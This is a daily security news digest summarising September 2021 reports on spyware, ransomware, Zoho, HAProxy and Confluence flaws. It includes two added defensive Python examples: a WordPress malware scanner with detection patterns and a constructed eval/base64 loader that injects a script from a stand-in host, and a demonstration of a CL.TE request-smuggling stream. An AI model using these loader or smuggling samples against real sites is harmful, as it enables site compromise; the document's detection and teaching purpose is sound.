07-09-2021 | 09-09-2021

Security daily (08-09-2021)

17 additional AWS services authorized for DoD workloads in the AWS GovCloud Regions

I’m pleased to announce that the Defense Information Systems Agency (DISA) has authorized 17 additional Amazon Web Services (AWS) services and features in the AWS GovCloud (US) Regions, bringing the total to 105 services and major features that are authorized for use by the U.S. Department of Defense (DoD). AWS now offers additional services to […] (AWS Security Blog)

IRS used vape store receipts to gather evidence against alleged Ukrainian scammer

U.S. law enforcement officials gathered details about a suspected cybercriminal by collecting intelligence from his apparent messages to vape shops in Ukraine. The accused scammer, Glib Oleksandr Ivanov-Tolpintsev, was arraigned Tuesday during an 11-minute hearing in which he appeared virtually from the Pinellas County Jail near Tampa, Fla. Ivanov-Tolpintsev is accused of accessing victims’ username and password credentials between 2016 and 2020, then acting as a seller on a cybercriminal forum where he sold the sensitive data and leased access to a botnet, an army of hacked computers capable of sending spam or infecting more computers. Using the aliases “sergios” and “mars,” Ivanov-Tolpintsev allegedly claimed that his botnet was capable of accessing 2,000 usernames and passwords a day, enabling other perpetrators to carry out identity theft or other kinds of fraud. U.S. officials accused the defendant of earning more than $80,000 as part of the scheme over four years. The […] (CyberScoop)

Russian cybercrime continues as government-backed attacks on companies dwindle, CrowdStrike says

The Russian approach to hacking shifted considerably over the past year, with state-sponsored attacks on commercial organizations dropping off even as the local cybercrime scene dominated the field, CrowdStrike said in a report Wednesday. From July 2020 to June of this year, Russian state-backed hacking outfits accounted for only a tiny sliver of nation-sponsored attacks aimed at commercial enterprises detected by the cyber firm’s threat hunting service, at 1% compared to China’s 69%. (The figure represents the findings from only one threat intelligence firm, and does not account for hacking campaigns that CrowdStrike might have missed.) Meanwhile, the suspected Russia-based hacking group that CrowdStrike calls Wizard Spider, and that has used the Ryuk ransomware since 2018, was responsible for double the number of detected attempted intrusions of any other cybercrime gang over the same period. While CrowdStrike didn’t have comparison figures on the percentages of state-sponsored attacks on commercial organizations […] (CyberScoop)

A spyware app designed to monitor Kurdish targets attracted more than 1,400 downloads

More than 1,400 people have downloaded a spyware app that, while appearing to deliver news, enables hackers to collect sensitive data about the Kurds, an ethnic community living throughout Iran, Iraq and northern Syria. The espionage campaign involves duping Android smartphone owners into downloading a program that spies use to record phone calls, extract files, take screenshots and gather other information from unwitting victims, according to details published Tuesday by the security vendor ESET. The endeavor marks the latest attempt to undercut the Kurds, an indigenous people embedded in conflicts of the Middle East over the past generation. Kurdish fighters have been active in the fight against the Islamic State group dating back to 2014, aligning with U.S. forces while also struggling against the Turkish government. Suspected Iranian hackers also used mobile spyware to monitor Kurdish targets, the security firm Check Point reported in February. The effort that ESET discovered […] (CyberScoop)

Pro-Beijing operatives used social media to try promoting NYC protest

Pro-China operatives behind an effort to cast a negative light on the United States during the COVID-19 pandemic tried using social media to promote a street demonstration earlier this year, according to findings released Wednesday by the intelligence firm Mandiant. As a part of ongoing research into suspected Chinese influence operations, investigators discovered a network of fake accounts spamming Twitter and other platforms in April with posts calling for Asian Americans to protest racial discrimination in New York City. The effort was an “early warning” that China is getting bolder in how it attempts to influence politics outside of its borders, says John Hultquist, vice president of threat intelligence at Mandiant, a division of FireEye. “The intent is what worries me here because they’re already trying to cross the serious line of getting people on the street,” said Hultquist. Mandiant did not definitively attribute the effort to the Chinese government. […] (CyberScoop)

Windows zero-day MSHTML attack – how not to get booby trapped!

Zero-day bug in MSHTML, the "mini-Internet Explorer" component of Windows, triggered by booby trapped Office files. (Naked Security)

TeamTNT Hacking Group Strikes Thousands Of Victims Worldwide

(News ≈ Packet Storm)

Ransomware Attack Hits Howard University

(News ≈ Packet Storm)

ProtonMail Under Fire After Police Data Handover

(News ≈ Packet Storm)

Netgear Smart Switches Open To Complete Takeover

(News ≈ Packet Storm)

Multistage WordPress Redirect Kit

Recently, one of our analysts @kpetku came across a series of semi-randomised malware injections in multiple WordPress environments. Typical of spam redirect infections, the malware redirects visitors by calling malicious files hosted on third party infected websites. Interestingly, the infection stores itself as encoded content in the database and is called through random functions littered throughout plugin files using the very common WordPress function “get_option”. In this post we will review this infection and its characteristics. (Sucuri Blog)
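The Sucuri summary describes the two halves of this infection: a loader planted in plugin files that reads a named option with get_option() and feeds it to a decoder and a code sink, and the encoded payload itself sitting in wp_options. The triage script below is an added example, not Sucuri's tooling and not the actual malware; the plugin sources, option names (such as qx_cache_7f3a) and option values are all constructed here to illustrate the pattern. It cross-references the two halves so that an option which is both read by a suspicious loader and decodes to script or PHP is rated higher than either indicator alone.

```python
"""Added example: triage the get_option() -> decode -> eval redirect pattern.
Not Sucuri's code; every sample below is constructed for illustration."""
import base64
import re

# Source-side indicators: an option read by name, a decoder, and a code sink.
GET_OPTION_RE = re.compile(r"get_option\s*\(\s*['\"]([A-Za-z0-9_\-]+)['\"]")
DECODER_RE = re.compile(r"\b(?:base64_decode|gzinflate|gzuncompress|str_rot13|strrev)\s*\(", re.I)
SINK_RE = re.compile(r"\b(?:eval|assert|create_function)\s*\(", re.I)
# Value-side indicators, checked after the stored blob has been decoded.
PAYLOAD_RE = re.compile(r"<\?php|<script|window\.location|location\.href|document\.location|\beval\s*\(", re.I)
B64_RE = re.compile(r"[A-Za-z0-9+/=\s]+")


def scan_plugin_source(path, src):
    """Flag a file that reads a named option AND decodes or evaluates data (the loader half)."""
    names = sorted(set(GET_OPTION_RE.findall(src)))
    has_decoder = bool(DECODER_RE.search(src))
    has_sink = bool(SINK_RE.search(src))
    if names and (has_decoder or has_sink):
        return {"path": path, "options": names, "decoder": has_decoder, "sink": has_sink}
    return None


def decode_layers(value, max_layers=5):
    """Peel nested base64 the way an injected loader would; stop at the first non-base64 layer."""
    current = value
    for _ in range(max_layers):
        text = current.strip()
        if not text or not B64_RE.fullmatch(text):
            break
        try:
            decoded = base64.b64decode(text).decode("utf-8")
        except (ValueError, UnicodeDecodeError):  # bad padding or binary garbage: not a layer
            break
        if decoded == current:
            break
        current = decoded
    return current


def triage(plugin_sources, options):
    """Cross-reference loader findings with wp_options rows; one dict per finding."""
    file_hits = [h for h in (scan_plugin_source(p, s) for p, s in plugin_sources.items()) if h]
    referenced = {n for h in file_hits for n in h["options"]}
    findings, flagged_options = [], set()
    for name, raw in options.items():
        decoded = decode_layers(raw)
        match = PAYLOAD_RE.search(decoded)
        if match:
            flagged_options.add(name)
            findings.append({"severity": "high" if name in referenced else "medium",
                             "option": name, "indicator": match.group(0), "decoded": decoded[:80]})
    for h in file_hits:
        linked = [n for n in h["options"] if n in flagged_options]
        findings.append({"severity": "high" if linked else "medium", "file": h["path"],
                         "options": h["options"], "linked_options": linked})
    return findings


# Constructed samples: one benign plugin file, one injected loader, and three option rows.
SAMPLE_PLUGIN_SOURCES = {
    "wp-content/plugins/contact-form/contact.php": """<?php
// benign: reads a setting and uses it as a number
$limit = (int) get_option('contact_form_rate_limit');
""",
    "wp-content/plugins/seo-tools/functions.php": """<?php
function qx_7f3a() { $d = get_option('qx_cache_7f3a'); eval(base64_decode($d)); }
add_action('init', 'qx_7f3a');
""",
}
SAMPLE_OPTIONS = {
    "siteurl": "https://example.invalid",
    "contact_form_rate_limit": "10",
    "qx_cache_7f3a": base64.b64encode(
        b"echo '<script src=\"https://bad.invalid/r.js\"></script>';").decode(),
}

if __name__ == "__main__":
    for finding in triage(SAMPLE_PLUGIN_SOURCES, SAMPLE_OPTIONS):
        print(finding)
```

On a real site the two inputs would be the plugin directory and a dump of wp_options (for example from `wp option list --format=json`); the heuristics are deliberately loose, so treat "medium" findings as leads to read by hand rather than as verdicts.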

CISA Warns of Actively Exploited Zoho ManageEngine ADSelfService Vulnerability

The U.S. Cybersecurity and Infrastructure Security Agency (CISA) on Wednesday issued a bulletin warning of a zero-day flaw affecting Zoho ManageEngine ADSelfService Plus deployments that is currently being actively exploited in the wild. The flaw, tracked as CVE-2021-40539, concerns a REST API authentication bypass that could lead to arbitrary remote code execution (RCE). ADSelfService Plus (The Hacker News)

3 Ways to Secure SAP SuccessFactors and Stay Compliant

The work-from-anywhere economy has opened up the possibility for your human resources team to source the best talent from anywhere. To scale their operations, organizations are leveraging the cloud to accelerate essential HR functions such as recruiting, onboarding, evaluating, and more. SAP is leading this HR transformation with its human capital management (HCM) solution, SAP SuccessFactors. (The Hacker News)

HAProxy Found Vulnerable to Critical HTTP Request Smuggling Attack

A critical security vulnerability has been disclosed in HAProxy, a widely used open-source load balancer and proxy server, that could be abused by an adversary to possibly smuggle HTTP requests, resulting in unauthorized access to sensitive data and execution of arbitrary commands, effectively opening the door to an array of attacks. Tracked as CVE-2021-40346, the Integer Overflow vulnerability (The Hacker News)
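The HAProxy entry names the outcome (request smuggling) but not the parsing detail behind it, so the example below shows the general mechanism in a form you can run: two lenient HTTP/1.1 framers that make different choices about where one request ends and the next begins, beside a strict framer that refuses the ambiguous message outright. This is added example code, not HAProxy's parser, and the byte stream it frames is constructed here; it does not reproduce the CVE-2021-40346 overflow itself.

```python
"""Added example (not HAProxy code): how a front-end and back-end can disagree on
request boundaries, and what a strict framer rejects. Sample stream is constructed."""
import re


class FramingError(ValueError):
    pass


def parse_head(raw):
    """Split one request head off the stream; headers come back lower-cased and stripped."""
    head, sep, rest = raw.partition(b"\r\n\r\n")
    if not sep:
        raise FramingError("incomplete request head")
    lines = head.split(b"\r\n")
    headers = []
    for line in lines[1:]:
        name, colon, value = line.partition(b":")
        if not colon:
            raise FramingError("malformed header line")
        headers.append((name.decode("latin-1").strip().lower(), value.decode("latin-1").strip()))
    return lines[0].decode("latin-1"), headers, rest


def read_chunked(data):
    """Consume a chunked body (RFC 7230 section 4.1); return (body, bytes after the trailer)."""
    body, pos = b"", 0
    while True:
        end = data.find(b"\r\n", pos)
        if end < 0:
            raise FramingError("truncated chunk size")
        size = int(data[pos:end].split(b";")[0].strip(), 16)
        pos = end + 2
        if size == 0:  # last chunk: skip trailer lines up to the blank line
            while True:
                tend = data.find(b"\r\n", pos)
                if tend < 0:
                    raise FramingError("truncated trailer")
                line, pos = data[pos:tend], tend + 2
                if not line:
                    return body, data[pos:]
        if len(data) < pos + size + 2 or data[pos + size:pos + size + 2] != b"\r\n":
            raise FramingError("truncated or badly terminated chunk")
        body += data[pos:pos + size]
        pos += size + 2


def frame(raw, mode):
    """Split a byte stream into (request_line, body) pairs.
    mode 'cl_first': honour Content-Length when present (a lenient front-end).
    mode 'te_first': honour Transfer-Encoding: chunked when present (a lenient back-end).
    mode 'strict': reject anything that could be framed two ways."""
    requests, data = [], raw
    while data:
        request_line, headers, rest = parse_head(data)
        cls = [v for n, v in headers if n == "content-length"]
        tes = [v for n, v in headers if n == "transfer-encoding"]
        if mode == "strict":
            if cls and tes:
                raise FramingError("both Content-Length and Transfer-Encoding present")
            if len(cls) > 1 or any(not re.fullmatch(r"[0-9]+", v) for v in cls):
                raise FramingError("duplicate or non-numeric Content-Length")
            codings = [c.strip().lower() for v in tes for c in v.split(",")]
            if tes and codings != ["chunked"]:
                raise FramingError("Transfer-Encoding must be exactly 'chunked'")
            chunked = codings == ["chunked"]
        else:
            chunked = any("chunked" in v.lower() for v in tes)  # lenient substring match
        if mode == "cl_first" and cls:
            n = int(cls[0])
            body, data = rest[:n], rest[n:]
        elif chunked:
            body, data = read_chunked(rest)
        elif cls:
            n = int(cls[0])
            body, data = rest[:n], rest[n:]
        else:
            body, data = b"", rest
        requests.append((request_line, body))
    return requests


def strict_rejects(raw):
    """True if the strict framer refuses the stream."""
    try:
        frame(raw, "strict")
        return False
    except FramingError:
        return True


# Constructed CL.TE stream: Content-Length covers the whole tail, but a chunked
# parser stops at the zero-size chunk and treats what follows as a second request.
SMUGGLED = b"GET /admin HTTP/1.1\r\nHost: example.invalid\r\n\r\n"
BODY = b"0\r\n\r\n" + SMUGGLED
STREAM = (b"POST / HTTP/1.1\r\nHost: example.invalid\r\n"
          b"Content-Length: " + str(len(BODY)).encode() + b"\r\n"
          b"Transfer-Encoding: chunked\r\n\r\n" + BODY)

if __name__ == "__main__":
    print("cl_first sees", [r for r, _ in frame(STREAM, "cl_first")])
    print("te_first sees", [r for r, _ in frame(STREAM, "te_first")])
    print("strict rejects:", strict_rejects(STREAM))
```

The practical check for a proxy or load balancer is the strict branch: one framing rule per message, Content-Length and Transfer-Encoding never both honoured, and anything else answered with 400 rather than forwarded. The lenient substring test for "chunked" is there on purpose; obfuscated transfer-coding values are one of the standard ways to get two parsers to disagree.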

Experts Uncover Mobile Spyware Attacks Targeting Kurdish Ethnic Group

Cybersecurity researchers on Tuesday released new findings that reveal a year-long mobile espionage campaign against the Kurdish ethnic group to deploy two Android backdoors that masquerade as legitimate apps. Active since at least March 2020, the attacks leveraged as many as six dedicated Facebook profiles that claimed to offer tech and pro-Kurd content — two aimed at Android users while the (The Hacker News)

[Ebook] The Guide for Speeding Time to Response for Lean IT Security Teams

Most cyber security today involves much more planning, and much less reacting than in the past. Security teams spend most of their time preparing their organizations' defenses and doing operational work. Even so, teams often must quickly spring into action to respond to an attack. Security teams with copious resources can quickly shift between these two modes. They have enough resources to (The Hacker News)

U.S. Cyber Command Warns of Ongoing Attacks Exploiting Atlassian Confluence Flaw

The U.S. Cyber Command on Friday warned of ongoing mass exploitation attempts in the wild targeting a now-patched critical security vulnerability affecting Atlassian Confluence deployments that could be abused by unauthenticated attackers to take control of a vulnerable system. "Mass exploitation of Atlassian Confluence CVE-2021-26084 is ongoing and expected to accelerate," the Cyber National (The Hacker News)

What Ragnar Locker Got Wrong About Ransomware Negotiators – Podcast

There are a lot of "tells" that the ransomware group doesn't understand how negotiators work, despite threatening to dox data if victims call for help. (Threatpost)

Tooling Network Detection & Response for Ransomware

Justin Jett, director of audit and compliance at Plixer, discusses how to effectively use network flow data in the fight against ransomware. (Threatpost)

Spoofing Bug Highlights Cybersecurity for Digital Vaccine Passports

Australian immunization app bug lets attackers fake vaccine status. (Threatpost)


/security-daily/ 09-09-2021 23:44:24